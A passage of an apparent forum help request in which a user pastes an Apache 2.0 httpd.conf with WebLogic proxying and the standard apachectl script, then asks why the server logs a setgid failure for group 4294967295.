/>&lt;/ifmodule&gt; <br /> <br /># BeOS MPM <br /># StartThreads: how many threads do we initially spawn? 
<br /># MaxClients:   max number of threads we can have (1 thread == 1 client) <br /># MaxRequestsPerThread: maximum number of requests each thread will process <br />&lt;ifmodule beos.c=""&gt; <br />StartThreads               10 <br />MaxClients                 50 <br />MaxRequestsPerThread       10000 <br />&lt;/ifmodule&gt;    <br /> <br /># NetWare MPM <br /># ThreadStackSize: Stack size allocated for each worker thread <br /># StartThreads: Number of worker threads launched at server startup <br /># MinSpareThreads: Minimum number of idle threads, to handle request spikes <br /># MaxSpareThreads: Maximum number of idle threads <br /># MaxThreads: Maximum number of worker threads alive at the same time <br /># MaxRequestsPerChild: Maximum  number of requests a thread serves. It is <br />#                      recommended that the default value of 0 be set for this <br />#                      directive on NetWare.  This will allow the thread to <br />#                      continue to service requests indefinitely.                          
<br />&lt;ifmodule mpm_netware.c=""&gt; <br />ThreadStackSize      65536 <br />StartThreads           250 <br />MinSpareThreads         25 <br />MaxSpareThreads        250 <br />MaxThreads            1000 <br />MaxRequestsPerChild      0 <br />MaxMemFree             100 <br />&lt;/ifmodule&gt; <br /> <br /># OS/2 MPM <br /># StartServers: Number of server processes to maintain <br /># MinSpareThreads: Minimum number of idle threads per process, <br />#                  to handle request spikes <br /># MaxSpareThreads: Maximum number of idle threads per process <br /># MaxRequestsPerChild: Maximum number of connections per server process <br />&lt;ifmodule mpmt_os2.c=""&gt; <br />StartServers           2 <br />MinSpareThreads        5 <br />MaxSpareThreads       10 <br />MaxRequestsPerChild    0 <br />&lt;/ifmodule&gt; <br /> <br /># <br /># Listen: Allows you to bind Apache to specific IP addresses and/or <br /># ports, instead of the default. See also the &lt;virtualhost&gt; <br /># directive. <br /># <br /># Change this to Listen on specific IP addresses as shown below to <br /># prevent Apache from glomming onto all bound IP addresses (0.0.0.0) <br /># <br />#Listen 12.34.56.78:80 <br /> <br />Listen 8081 <br /> <br /># <br /># Dynamic Shared Object (DSO) Support <br /># <br /># To be able to use the functionality of a module which was built as a DSO you <br /># have to place corresponding `LoadModule' lines at this location so the <br /># directives contained in it are actually available _before_ they are used. <br /># Statically compiled modules (those listed by `httpd -l') do not need <br /># to be loaded here. 
<br /># <br /># Example: <br /># LoadModule foo_module modules/mod_foo.so <br /># <br />LoadModule weblogic_module modules/mod_wl_20.so <br /> <br /># <br /># ExtendedStatus controls whether Apache will generate "full" status <br /># information (ExtendedStatus On) or just basic information (ExtendedStatus <br /># Off) when the "server-status" handler is called. The default is Off. <br /># <br />#ExtendedStatus On <br /> <br />### Section 2: 'Main' server configuration <br /># <br /># The directives in this section set up the values used by the 'main' <br /># server, which responds to any requests that aren't handled by a <br /># &lt;virtualhost&gt; definition.  These values also provide defaults for <br /># any &lt;virtualhost&gt; containers you may define later in the file. <br /># <br /># All of these directives may appear inside &lt;virtualhost&gt; containers, <br /># in which case these default settings will be overridden for the <br /># virtual host being defined. <br /># <br /> <br />&lt;ifmodule !mpm_winnt.c=""&gt; <br />&lt;ifmodule !mpm_netware.c=""&gt; <br /># <br /># If you wish httpd to run as a different user or group, you must run <br /># httpd as root initially and it will switch.  <br /># <br /># User/Group: The name (or #number) of the user/group to run httpd as. <br />#  . On SCO (ODT 3) use "User nouser" and "Group nogroup". <br />#  . On HPUX you may not be able to use shared memory as nobody, and the <br />#    suggested workaround is to create a user www and use that user. <br />#  NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET) <br />#  when the value of (unsigned)Group is above 60000; <br />#  don't use Group #-1 on these systems! <br /># <br />User nobody <br />Group #-1 <br />&lt;/ifmodule&gt; <br />&lt;/ifmodule&gt; <br /> <br /># <br /># ServerAdmin: Your address, where problems with the server should be <br /># e-mailed.  This address appears on some server-generated pages, such <br /># as error documents.  e.g. 
admin@your-domain.com <br /># <br />ServerAdmin you@example.com <br /> <br /># <br /># ServerName gives the name and port that the server uses to identify itself. <br /># This can often be determined automatically, but we recommend you specify <br /># it explicitly to prevent problems during startup. <br /># <br /># If this is not set to valid DNS name for your host, server-generated <br /># redirections will not work.  See also the UseCanonicalName directive. <br /># <br /># If your host doesn't have a registered DNS name, enter its IP address here. <br /># You will have to access it by its address anyway, and this will make <br /># redirections work in a sensible way. <br /># <br /># ServerName www.example.com:80 <br /> <br /> <br /># <br /># UseCanonicalName: Determines how Apache constructs self-referencing <br /># URLs and the SERVER_NAME and SERVER_PORT variables. <br /># When set "Off", Apache will use the Hostname and Port supplied <br /># by the client.  When set "On", Apache will use the value of the <br /># ServerName directive. <br /># <br />UseCanonicalName Off <br /> <br /># <br /># DocumentRoot: The directory out of which you will serve your <br /># documents. By default, all requests are taken from this directory, but <br /># symbolic links and aliases may be used to point to other locations. <br /># <br />DocumentRoot "/home/weblogic/apache//htdocs" <br /> <br /># <br /># Each directory to which Apache has access can be configured with respect <br /># to which services and features are allowed and/or disabled in that <br /># directory (and its subdirectories). <br /># <br /># First, we configure the "default" to be a very restrictive set of <br /># features.  
<br /># <br />&lt;directory&gt; <br />Options FollowSymLinks <br />AllowOverride None <br />&lt;/directory&gt; <br /> <br /># <br /># Note that from this point forward you must specifically allow <br /># particular features to be enabled - so if something's not working as <br /># you might expect, make sure that you have specifically enabled it <br /># below. <br /># <br /> <br /># <br /># This should be changed to whatever you set DocumentRoot to. <br /># <br />&lt;directory "="" home="" weblogic="" apache="" htdocs"=""&gt; <br /> <br /># <br /># Possible values for the Options directive are "None", "All", <br /># or any combination of: <br />#   Indexes Includes FollowSymLinks SymLinksifOwnerMatch ExecCGI MultiViews <br /># <br /># Note that "MultiViews" must be named *explicitly* --- "Options All" <br /># doesn't give it to you. <br /># <br /># The Options directive is both complicated and important.  Please see <br /># http://httpd.apache.org/docs/2.0/mod/core.html#options <br /># for more information. <br /># <br />Options Indexes FollowSymLinks <br /> <br /># <br /># AllowOverride controls what directives may be placed in .htaccess files. <br /># It can be "All", "None", or any combination of the keywords: <br />#   Options FileInfo AuthConfig Limit Indexes <br /># <br />AllowOverride None <br /> <br /># <br /># Controls who can get stuff from this server. <br /># <br />Order allow,deny <br />Allow from all <br /> <br />&lt;/directory&gt; <br /> <br /># <br /># UserDir: The name of the directory that is appended onto a user's home <br /># directory if a ~user request is received. <br /># <br />UserDir public_html <br /> <br /># <br /># Control access to UserDir directories.  The following is an example <br /># for a site where these directories are restricted to read-only. 
<br /># <br />#&lt;directory home="" *="" public_html=""&gt; <br />#    AllowOverride FileInfo AuthConfig Limit Indexes <br />#    Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec <br />#    &lt;limit get="" post="" options="" propfind=""&gt; <br />#        Order allow,deny <br />#        Allow from all <br />#    &lt;/limit&gt; <br />#    &lt;limitexcept get="" post="" options="" propfind=""&gt; <br />#        Order deny,allow <br />#        Deny from all <br />#    &lt;/limitexcept&gt; <br />#&lt;/directory&gt; <br /> <br /># <br /># DirectoryIndex: sets the file that Apache will serve if a directory <br /># is requested. <br /># <br /># The index.html.var file (a type-map) is used to deliver content- <br /># negotiated documents.  The MultiViews Option can be used for the <br /># same purpose, but it is much slower. <br /># <br />DirectoryIndex index.html index.html.var <br /> <br /># <br /># AccessFileName: The name of the file to look for in each directory <br /># for additional configuration directives.  See also the AllowOverride <br /># directive. <br /># <br />AccessFileName .htaccess <br /> <br /># <br /># The following lines prevent .htaccess and .htpasswd files from being <br /># viewed by Web clients. <br /># <br />&lt;filesmatch "^\.ht"=""&gt; <br />Order allow,deny <br />Deny from all <br />&lt;/filesmatch&gt; <br /> <br /># <br /># TypesConfig describes where the mime.types file (or equivalent) is <br /># to be found. <br /># <br />TypesConfig conf/mime.types <br /> <br /># <br /># DefaultType is the default MIME type the server will use for a document <br /># if it cannot otherwise determine one, such as from filename extensions. <br /># If your server contains mostly text or HTML documents, "text/plain" is <br /># a good value.  
If most of your content is binary, such as applications <br /># or images, you may want to use "application/octet-stream" instead to <br /># keep browsers from trying to display binary files as though they are <br /># text. <br /># <br />DefaultType text/plain <br /> <br /># <br /># The mod_mime_magic module allows the server to use various hints from the <br /># contents of the file itself to determine its type.  The MIMEMagicFile <br /># directive tells the module where the hint definitions are located. <br /># <br />&lt;ifmodule mod_mime_magic.c=""&gt; <br />MIMEMagicFile conf/magic <br />&lt;/ifmodule&gt; <br /> <br /># <br /># HostnameLookups: Log the names of clients or just their IP addresses <br /># e.g., www.apache.org (on) or 204.62.129.132 (off). <br /># The default is off because it'd be overall better for the net if people <br /># had to knowingly turn this feature on, since enabling it means that <br /># each client request will result in AT LEAST one lookup request to the <br /># nameserver. <br /># <br />HostnameLookups Off <br /> <br /># <br /># EnableMMAP: Control whether memory-mapping is used to deliver <br /># files (assuming that the underlying OS supports it). <br /># The default is on; turn this off if you serve from NFS-mounted <br /># filesystems.  On some systems, turning it off (regardless of <br /># filesystem) can improve performance; for details, please see <br /># http://httpd.apache.org/docs/2.0/mod/core.html#enablemmap <br /># <br />#EnableMMAP off <br /> <br /># <br /># EnableSendfile: Control whether the sendfile kernel support is <br /># used  to deliver files (assuming that the OS supports it). <br /># The default is on; turn this off if you serve from NFS-mounted <br /># filesystems.  Please see <br /># http://httpd.apache.org/docs/2.0/mod/core.html#enablesendfile <br /># <br />#EnableSendfile off <br /> <br /># <br /># ErrorLog: The location of the error log file. 
# If you do not specify an ErrorLog directive within a <VirtualHost>
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a <VirtualHost>
# container, that host's errors will be logged there and not here.
#
ErrorLog logs/error_log

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

# You need to enable mod_logio.c to use %I and %O
#LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio

#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a <VirtualHost>
# container, they will be logged here.  Contrariwise, if you *do*
# define per-<VirtualHost> access logfiles, transactions will be
# logged therein and *not* in this file.
#
CustomLog logs/access_log common

#
# If you would like to have agent and referer logfiles, uncomment the
# following directives.
#
#CustomLog logs/referer_log referer
#CustomLog logs/agent_log agent

#
# If you prefer a single logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
#CustomLog logs/access_log combined

#
# ServerTokens
# This directive configures what you return as the Server HTTP response
# Header. The default is 'Full' which sends information about the OS-Type
# and compiled in modules.
# Set to one of:  Full | OS | Minor | Minimal | Major | Prod
# where Full conveys the most information, and Prod the least.
#
ServerTokens Full

#
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (internal error documents, FTP directory
# listings, mod_status and mod_info output etc., but not CGI generated
# documents or custom error documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of:  On | Off | EMail
#
ServerSignature On

#
# Aliases: Add here as many aliases as you need (with no limit). The format is
# Alias fakename realname
#
# Note that if you include a trailing / on fakename then the server will
# require it to be present in the URL.  So "/icons" isn't aliased in this
# example, only "/icons/".  If the fakename is slash-terminated, then the
# realname must also be slash terminated, and if the fakename omits the
# trailing slash, the realname must also omit it.
#
# We include the /icons/ alias for FancyIndexed directory listings.  If you
# do not use FancyIndexing, you may comment this out.
#
Alias /icons/ "/home/weblogic/apache//icons/"

<Directory "/home/weblogic/apache//icons">
    Options Indexes MultiViews
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

#
# This should be changed to the ServerRoot/manual/.  The alias provides
# the manual, even if you choose to move your DocumentRoot.  You may comment
# this out if you do not care for the documentation.
#
AliasMatch ^/manual(?:/(?:de|en|es|fr|ja|ko|ru))?(/.*)?$ "/home/weblogic/apache//manual$1"

<Directory "/home/weblogic/apache//manual">
    Options Indexes
    AllowOverride None
    Order allow,deny
    Allow from all

    <Files *.html>
        SetHandler type-map
    </Files>

    SetEnvIf Request_URI ^/manual/(de|en|es|fr|ja|ko|ru)/ prefer-language=$1
    RedirectMatch 301 ^/manual(?:/(de|en|es|fr|ja|ko|ru)){2,}(/.*)?$ /manual/$1$2
</Directory>

#
# ScriptAlias: This controls which directories contain server scripts.
# ScriptAliases are essentially the same as Aliases, except that
# documents in the realname directory are treated as applications and
# run by the server when requested rather than as documents sent to the client.
# The same rules about trailing "/" apply to ScriptAlias directives as to
# Alias.
#
ScriptAlias /cgi-bin/ "/home/weblogic/apache//cgi-bin/"

<IfModule mod_cgid.c>
    #
    # Additional to mod_cgid.c settings, mod_cgid has Scriptsock <Path>
    # for setting UNIX socket for communicating with cgid.
    #
    #Scriptsock            logs/cgisock
</IfModule>

#
# "/home/weblogic/apache//cgi-bin" should be changed to whatever your ScriptAliased
# CGI directory exists, if you have that configured.
#
<Directory "/home/weblogic/apache//cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>

#
# Redirect allows you to tell clients about documents which used to exist in
# your server's namespace, but do not anymore. This allows you to tell the
# clients where to look for the relocated document.
#
# Example:
# Redirect permanent /foo http://www.example.com/bar

#
# Directives controlling the display of server-generated directory listings.
#

#
# IndexOptions: Controls the appearance of server-generated directory
# listings.
#
IndexOptions FancyIndexing VersionSort

#
# AddIcon* directives tell the server which icon to show for different
# files or filename extensions.  These are only displayed for
# FancyIndexed directories.
#
AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip

AddIconByType (TXT,/icons/text.gif) text/*
AddIconByType (IMG,/icons/image2.gif) image/*
AddIconByType (SND,/icons/sound2.gif) audio/*
AddIconByType (VID,/icons/movie.gif) video/*

AddIcon /icons/binary.gif .bin .exe
AddIcon /icons/binhex.gif .hqx
AddIcon /icons/tar.gif .tar
AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
AddIcon /icons/a.gif .ps .ai .eps
AddIcon /icons/layout.gif .html .shtml .htm .pdf
AddIcon /icons/text.gif .txt
AddIcon /icons/c.gif .c
AddIcon /icons/p.gif .pl .py
AddIcon /icons/f.gif .for
AddIcon /icons/dvi.gif .dvi
AddIcon /icons/uuencoded.gif .uu
AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
AddIcon /icons/tex.gif .tex
AddIcon /icons/bomb.gif core

AddIcon /icons/back.gif ..
AddIcon /icons/hand.right.gif README
AddIcon /icons/folder.gif ^^DIRECTORY^^
AddIcon /icons/blank.gif ^^BLANKICON^^

#
# DefaultIcon is which icon to show for files which do not have an icon
# explicitly set.
#
DefaultIcon /icons/unknown.gif

#
# AddDescription allows you to place a short description after a file in
# server-generated indexes.  These are only displayed for FancyIndexed
# directories.
# Format: AddDescription "description" filename
#
#AddDescription "GZIP compressed document" .gz
#AddDescription "tar archive" .tar
#AddDescription "GZIP compressed tar archive" .tgz

#
# ReadmeName is the name of the README file the server will look for by
# default, and append to directory listings.
#
# HeaderName is the name of a file which should be prepended to
# directory indexes.
ReadmeName README.html
HeaderName HEADER.html

#
# IndexIgnore is a set of filenames which directory indexing should ignore
# and not include in the listing.  Shell-style wildcarding is permitted.
#
IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t

#
# DefaultLanguage and AddLanguage allows you to specify the language of
# a document. You can then use content negotiation to give a browser a
# file in a language the user can understand.
#
# Specify a default language. This means that all data
# going out without a specific language tag (see below) will
# be marked with this one. You probably do NOT want to set
# this unless you are sure it is correct for all cases.
#
# * It is generally better to not mark a page as
# * being a certain language than marking it with the wrong
# * language!
#
# DefaultLanguage nl
#
# Note 1: The suffix does not have to be the same as the language
# keyword --- those with documents in Polish (whose net-standard
# language code is pl) may wish to use "AddLanguage pl .po" to
# avoid the ambiguity with the common suffix for perl scripts.
#
# Note 2: The example entries below illustrate that in some cases
# the two character 'Language' abbreviation is not identical to
# the two character 'Country' code for its country,
# E.g. 'Danmark/dk' versus 'Danish/da'.
#
# Note 3: In the case of 'ltz' we violate the RFC by using a three char
# specifier. There is 'work in progress' to fix this and get
# the reference data for rfc1766 cleaned up.
#
# Catalan (ca) - Croatian (hr) - Czech (cs) - Danish (da) - Dutch (nl)
# English (en) - Esperanto (eo) - Estonian (et) - French (fr) - German (de)
# Greek-Modern (el) - Hebrew (he) - Italian (it) - Japanese (ja)
# Korean (ko) - Luxembourgeois* (ltz) - Norwegian Nynorsk (nn)
# Norwegian (no) - Polish (pl) - Portugese (pt)
# Brazilian Portuguese (pt-BR) - Russian (ru) - Swedish (sv)
# Simplified Chinese (zh-CN) - Spanish (es) - Traditional Chinese (zh-TW)
#
AddLanguage ca .ca
AddLanguage cs .cz .cs
AddLanguage da .dk
AddLanguage de .de
AddLanguage el .el
AddLanguage en .en
AddLanguage eo .eo
AddLanguage es .es
AddLanguage et .et
AddLanguage fr .fr
AddLanguage he .he
AddLanguage hr .hr
AddLanguage it .it
AddLanguage ja .ja
AddLanguage ko .ko
AddLanguage ltz .ltz
AddLanguage nl .nl
AddLanguage nn .nn
AddLanguage no .no
AddLanguage pl .po
AddLanguage pt .pt
AddLanguage pt-BR .pt-br
AddLanguage ru .ru
AddLanguage sv .sv
AddLanguage zh-CN .zh-cn
AddLanguage zh-TW .zh-tw

#
# LanguagePriority allows you to give precedence to some languages
# in case of a tie during content negotiation.
#
# Just list the languages in decreasing order of preference. We have
# more or less alphabetized them here. You probably want to change this.
#
LanguagePriority en ca cs da de el eo es et fr he hr it ja ko ltz nl nn no pl pt pt-BR ru sv zh-CN zh-TW

#
# ForceLanguagePriority allows you to serve a result page rather than
# MULTIPLE CHOICES (Prefer) [in case of a tie] or NOT ACCEPTABLE (Fallback)
# [in case no accepted languages matched the available variants]
#
ForceLanguagePriority Prefer Fallback

#
# Commonly used filename extensions to character sets. You probably
# want to avoid clashes with the language extensions, unless you
# are good at carefully testing your setup after each change.
# See http://www.iana.org/assignments/character-sets for the
# official list of charset names and their respective RFCs.
#
AddCharset ISO-8859-1  .iso8859-1  .latin1
AddCharset ISO-8859-2  .iso8859-2  .latin2 .cen
AddCharset ISO-8859-3  .iso8859-3  .latin3
AddCharset ISO-8859-4  .iso8859-4  .latin4
AddCharset ISO-8859-5  .iso8859-5  .latin5 .cyr .iso-ru
AddCharset ISO-8859-6  .iso8859-6  .latin6 .arb
AddCharset ISO-8859-7  .iso8859-7  .latin7 .grk
AddCharset ISO-8859-8  .iso8859-8  .latin8 .heb
AddCharset ISO-8859-9  .iso8859-9  .latin9 .trk
AddCharset ISO-2022-JP .iso2022-jp .jis
AddCharset ISO-2022-KR .iso2022-kr .kis
AddCharset ISO-2022-CN .iso2022-cn .cis
AddCharset Big5        .Big5       .big5
# For russian, more than one charset is used (depends on client, mostly):
AddCharset WINDOWS-1251 .cp-1251   .win-1251
AddCharset CP866       .cp866
AddCharset KOI8-r      .koi8-r .koi8-ru
AddCharset KOI8-ru     .koi8-uk .ua
AddCharset ISO-10646-UCS-2 .ucs2
AddCharset ISO-10646-UCS-4 .ucs4
AddCharset UTF-8       .utf8

# The set below does not map to a specific (iso) standard
# but works on a fairly wide range of browsers.  Note that
# capitalization actually matters (it should not, but it
# does for some browsers).
#
# See http://www.iana.org/assignments/character-sets
# for a list of sorts. But browsers support few.
#
AddCharset GB2312      .gb2312 .gb
AddCharset utf-7       .utf7
AddCharset utf-8       .utf8
AddCharset big5        .big5 .b5
AddCharset EUC-TW      .euc-tw
AddCharset EUC-JP      .euc-jp
AddCharset EUC-KR      .euc-kr
AddCharset shift_jis   .sjis

#
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
#AddType application/x-tar .tgz
#
# AddEncoding allows you to have certain browsers uncompress
# information on the fly. Note: Not all browsers support this.
# Despite the name similarity, the following Add* directives have nothing
# to do with the FancyIndexing customization directives above.
#
#AddEncoding x-compress .Z
#AddEncoding x-gzip .gz .tgz
#
# If the AddEncoding directives above are commented-out, then you
# probably should define those extensions to indicate media types:
#
AddType application/x-compress .Z
AddType application/x-gzip .gz .tgz

#
# AddHandler allows you to map certain file extensions to "handlers":
# actions unrelated to filetype. These can be either built into the server
# or added with the Action directive (see below)
#
# To use CGI scripts outside of ScriptAliased directories:
# (You will also need to add "ExecCGI" to the "Options" directive.)
#
#AddHandler cgi-script .cgi

#
# For files that include their own HTTP headers:
#
#AddHandler send-as-is asis

#
# For server-parsed imagemap files:
#
#AddHandler imap-file map

#
# For type maps (negotiated resources):
# (This is enabled by default to allow the Apache "It Worked" page
#  to be distributed in multiple languages.)
#
AddHandler type-map var

#
# Filters allow you to process content before it is sent to the client.
#
# To parse .shtml files for server-side includes (SSI):
# (You will also need to add "Includes" to the "Options" directive.)
#
#AddType text/html .shtml
#AddOutputFilter INCLUDES .shtml

#
# Action lets you define media types that will execute a script whenever
# a matching file is called. This eliminates the need for repeated URL
# pathnames for oft-used CGI file processors.
# Format: Action media/type /cgi-script/location
# Format: Action handler-name /cgi-script/location
#

#
# Customizable error responses come in three flavors:
# 1) plain text 2) local redirects 3) external redirects
#
# Some examples:
#ErrorDocument 500 "The server made a boo boo."
#ErrorDocument 404 /missing.html
#ErrorDocument 404 "/cgi-bin/missing_handler.pl"
#ErrorDocument 402 http://www.example.com/subscription_info.html
#

#
# Putting this all together, we can internationalize error responses.
#
# We use Alias to redirect any /error/HTTP_<error>.html.var response to
# our collection of by-error message multi-language collections.  We use
# includes to substitute the appropriate text.
#
# You can modify the messages' appearance without changing any of the
# default HTTP_<error>.html.var files by adding the line:
#
#   Alias /error/include/ "/your/include/path/"
#
# which allows you to create your own set of files by starting with the
# /home/weblogic/apache//error/include/ files and copying them to /your/include/path/,
# even on a per-VirtualHost basis.  The default include files will display
# your Apache version number and your ServerAdmin email address regardless
# of the setting of ServerSignature.
#
# The internationalized error documents require mod_alias, mod_include
# and mod_negotiation.  To activate them, uncomment the following 30 lines.

#    Alias /error/ "/home/weblogic/apache//error/"
#
#    <Directory "/home/weblogic/apache//error">
#        AllowOverride None
#        Options IncludesNoExec
#        AddOutputFilter Includes html
#        AddHandler type-map var
#        Order allow,deny
#        Allow from all
#        LanguagePriority en cs de es fr it ja ko nl pl pt-br ro sv tr
#        ForceLanguagePriority Prefer Fallback
#    </Directory>
#
#    ErrorDocument 400 /error/HTTP_BAD_REQUEST.html.var
#    ErrorDocument 401 /error/HTTP_UNAUTHORIZED.html.var
#    ErrorDocument 403 /error/HTTP_FORBIDDEN.html.var
#    ErrorDocument 404 /error/HTTP_NOT_FOUND.html.var
#    ErrorDocument 405 /error/HTTP_METHOD_NOT_ALLOWED.html.var
#    ErrorDocument 408 /error/HTTP_REQUEST_TIME_OUT.html.var
#    ErrorDocument 410 /error/HTTP_GONE.html.var
#    ErrorDocument 411 /error/HTTP_LENGTH_REQUIRED.html.var
#    ErrorDocument 412 /error/HTTP_PRECONDITION_FAILED.html.var
#    ErrorDocument 413 /error/HTTP_REQUEST_ENTITY_TOO_LARGE.html.var
#    ErrorDocument 414 /error/HTTP_REQUEST_URI_TOO_LARGE.html.var
#    ErrorDocument 415 /error/HTTP_UNSUPPORTED_MEDIA_TYPE.html.var
#    ErrorDocument 500 /error/HTTP_INTERNAL_SERVER_ERROR.html.var
#    ErrorDocument 501 /error/HTTP_NOT_IMPLEMENTED.html.var
#    ErrorDocument 502 /error/HTTP_BAD_GATEWAY.html.var
#    ErrorDocument 503 /error/HTTP_SERVICE_UNAVAILABLE.html.var
#    ErrorDocument 506 /error/HTTP_VARIANT_ALSO_VARIES.html.var


#
# The following directives modify normal HTTP response behavior to
# handle known problems with browser implementations.
#
BrowserMatch "Mozilla/2" nokeepalive
BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0
BrowserMatch "RealPlayer 4\.0" force-response-1.0
BrowserMatch "Java/1\.0" force-response-1.0
BrowserMatch "JDK/1\.0" force-response-1.0

#
# The following directive disables redirects on non-GET requests for
# a directory that does not include the trailing slash.  This fixes a
# problem with Microsoft WebFolders which does not appropriately handle
# redirects for folders with DAV methods.
# Same deal with Apple's DAV filesystem and Gnome VFS support for DAV.
#
BrowserMatch "Microsoft Data Access Internet Publishing Provider" redirect-carefully
BrowserMatch "MS FrontPage" redirect-carefully
BrowserMatch "^WebDrive" redirect-carefully
BrowserMatch "^WebDAVFS/1.[0123]" redirect-carefully
BrowserMatch "^gnome-vfs" redirect-carefully
BrowserMatch "^XML Spy" redirect-carefully
BrowserMatch "^Dreamweaver-WebDAV-SCM1" redirect-carefully

#
# Allow server status reports generated by mod_status,
# with the URL of http://servername/server-status
# Change the ".example.com" to match your domain to enable.
#
#<Location /server-status>
#    SetHandler server-status
#    Order deny,allow
#    Deny from all
#    Allow from .example.com
#</Location>

#
# Allow remote server configuration reports, with the URL of
#  http://servername/server-info (requires that mod_info.c be loaded).
# Change the ".example.com" to match your domain to enable.
#
#<Location /server-info>
#    SetHandler server-info
#    Order deny,allow
#    Deny from all
#    Allow from .example.com
#</Location>


#
# Bring in additional module-specific configurations
#
<IfModule mod_ssl.c>
    Include conf/ssl.conf
</IfModule>


### Section 3: Virtual Hosts
#
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at
# <URL:http://httpd.apache.org/docs/2.0/vhosts/>
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.

#
# Use name-based virtual hosting.
#
#NameVirtualHost *:80

#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
# The first VirtualHost section is used for requests without a known
# server name.
<br /># <br />#&lt;virtualhost *:80=""&gt; <br />#    ServerAdmin webmaster@dummy-host.example.com <br />#    DocumentRoot /www/docs/dummy-host.example.com <br />#    ServerName dummy-host.example.com <br />#    ErrorLog logs/dummy-host.example.com-error_log <br />#    CustomLog logs/dummy-host.example.com-access_log common <br />#&lt;/virtualhost&gt; <br /> <br />#&lt;location insiis=""&gt; <br />#  SetHandler weblogic-handler <br />#&lt;/location&gt;  <br /> <br />&lt;ifmodule mod_weblogic.c=""&gt; <br />  WebLogicCluster 192.168.108.12:8091,192.168.108.13:8092 <br />  MatchExpression * <br />&lt;/ifmodule&gt; <br />------------------------------ <br />apachectl 内容如下 <br />------------------------------ <br />#!/bin/sh <br /># <br /># Licensed to the Apache Software Foundation (ASF) under one or more <br /># contributor license agreements.  See the NOTICE file distributed with <br /># this work for additional information regarding copyright ownership. <br /># The ASF licenses this file to You under the Apache License, Version 2.0 <br /># (the "License"); you may not use this file except in compliance with <br /># the License.  You may obtain a copy of the License at <br /># <br />#     http://www.apache.org/licenses/LICENSE-2.0 <br /># <br /># Unless required by applicable law or agreed to in writing, software <br /># distributed under the License is distributed on an "AS IS" BASIS, <br /># WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. <br /># See the License for the specific language governing permissions and <br /># limitations under the License. <br /># <br /># <br /># Apache control script designed to allow an easy command line interface <br /># to controlling Apache.  
Written by Marc Slemko, 1997/08/23 <br /># <br /># The exit codes returned are: <br />#   XXX this doc is no longer correct now that the interesting <br />#   XXX functions are handled by httpd <br /># 0 - operation completed successfully <br /># 1 - <br /># 2 - usage error <br /># 3 - httpd could not be started <br /># 4 - httpd could not be stopped <br /># 5 - httpd could not be started during a restart <br /># 6 - httpd could not be restarted during a restart <br /># 7 - httpd could not be restarted during a graceful restart <br /># 8 - configuration syntax error <br /># <br /># When multiple arguments are given, only the error from the _last_ <br /># one is reported.  Run "apachectl help" for usage info <br /># <br />ARGV="$@" <br /># <br /># |||||||||||||||||||| START CONFIGURATION SECTION  |||||||||||||||||||| <br /># --------------------                              -------------------- <br /># <br /># the path to your httpd binary, including options if necessary <br />HTTPD='/home/weblogic/apache//bin/httpd' <br /># <br /># pick up any necessary environment variables <br />if test -f /home/weblogic/apache//bin/envvars; then <br />  . /home/weblogic/apache//bin/envvars <br />fi <br /># <br /># a command that outputs a formatted text version of the HTML at the <br /># url given on the command line.  Designed for lynx, however other <br /># programs may work.  <br />LYNX="lynx -dump" <br /># <br /># the URL to your server's mod_status status page.  If you do not <br /># have one, then status and fullstatus will not work. <br />STATUSURL="http://localhost:80/server-status" <br /># <br /># Set this variable to a command that increases the maximum <br /># number of file descriptors allowed per child process. This is <br /># critical for configurations that use many file descriptors, <br /># such as mass vhosting, or a multithreaded server. 
<br />ULIMIT_MAX_FILES="ulimit -S -n unlimited" <br /># --------------------                              -------------------- <br /># ||||||||||||||||||||   END CONFIGURATION SECTION  |||||||||||||||||||| <br /> <br /># Set the maximum number of file descriptors allowed per child process. <br />if [ "x$ULIMIT_MAX_FILES" != "x" ] ; then <br />    $ULIMIT_MAX_FILES <br />fi <br /> <br />ERROR=0 <br />if [ "x$ARGV" = "x" ] ; then <br />    ARGV="-h" <br />fi <br /> <br />case $ARGV in <br />start|stop|restart|graceful) <br />    $HTTPD -k $ARGV <br />    ERROR=$? <br />    ;; <br />startssl|sslstart|start-SSL) <br />    $HTTPD -k start -DSSL <br />    ERROR=$? <br />    ;; <br />configtest) <br />    $HTTPD -t <br />    ERROR=$? <br />    ;; <br />status) <br />    $LYNX $STATUSURL | awk ' /process$/ { print; exit } { print } ' <br />    ;; <br />fullstatus) <br />    $LYNX $STATUSURL <br />    ;; <br />*) <br />    $HTTPD $ARGV <br />    ERROR=$? <br />esac <br /> <br />exit $ERROR <br />------------------------------------------ <br />logs的纪录是 <br />Invalid argument: setgid: unable to set group id to Group 4294967295 (号码虚拟) <br /> <br />哪位xdjm帮忙解答一下 <br 